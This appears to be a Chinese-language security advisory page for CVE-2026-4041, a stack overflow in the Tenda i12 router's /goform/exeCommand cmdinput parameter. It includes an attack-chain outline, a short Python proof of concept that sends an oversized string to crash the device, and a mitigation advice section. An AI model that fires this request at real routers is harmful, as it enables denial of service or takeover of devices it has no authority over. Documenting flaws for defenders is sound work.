CVE-2026-4041 CVSS 8.8 高危

CVE-2026-4041 Tenda i12 栈缓冲区溢出漏洞

披露日期: 2026-03-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4041

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda i12 1.0.0.6(2204)

漏洞概述

CVE-2026-4041是Tenda i12路由器1.0.0.6(2204)版本中的一个高危安全漏洞。该漏洞位于/goform/exeCommand接口的vos_strcpy函数中，由于对用户输入的cmdinput参数缺乏有效的长度检查，导致栈缓冲区溢出。攻击者可以通过发送精心构造的恶意请求，无需或仅需低权限即可远程利用此漏洞。成功利用可能导致设备拒绝服务、执行任意代码或获取设备完全控制权。此漏洞已被公开披露，存在被恶意利用的风险，建议尽快采取防护措施。

技术细节

该漏洞属于经典的栈缓冲区溢出问题。在C语言中，vos_strcpy函数类似于标准的strcpy函数，用于字符串复制操作。问题在于该函数在执行字符串复制时未验证源字符串长度是否超过目标缓冲区的容量。当攻击者向/goform/exeCommand接口提交超长字符串作为cmdinput参数时，过长的数据会覆盖相邻的栈内存区域，包括返回地址、函数指针等关键数据结构。攻击者可利用此特性覆写栈中的返回地址，将执行流重定向到恶意代码，从而实现远程代码执行。由于该接口存在于Web服务进程中，攻击者可通过HTTP请求远程触发此漏洞。

攻击链分析

STEP 1

攻击者识别目标Tenda i12路由器并确认其版本为1.0.0.6(2204)

STEP 2

攻击者访问/goform/exeCommand接口，发现cmdinput参数存在且未进行长度验证

STEP 3

构造包含超长字符串的恶意请求，发送至目标设备

STEP 4

超长输入数据溢出栈缓冲区，覆写返回地址

STEP 5

执行流被重定向至攻击者控制的代码，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://192.168.0.1'

# 构造超长字符串触发溢出
overflow_payload = 'A' * 1000

try:
    response = requests.post(
        f'{target}/goform/exeCommand',
        data={'cmdinput': overflow_payload},
        timeout=5
    )
    print(f'Response status: {response.status_code}')
except requests.exceptions.RequestException as e:
    print(f'Request failed: {e}')

影响范围

Tenda i12 1.0.0.6(2204)

防御指南

临时缓解措施

立即断开受影响的Tenda i12设备与网络的连接，直至厂商发布官方修复补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4041
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4041
3 Details https://www.cvedetails.com/cve/CVE-2026-4041/
4 VulDB https://vuldb.com/cve/CVE-2026-4041
5 Link https://github.com/Jimi-Lab/cve/issues/1
6 Link https://vuldb.com/?ctiid.350653
7 Link https://vuldb.com/?id.350653
8 Link https://vuldb.com/?submit.769462
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表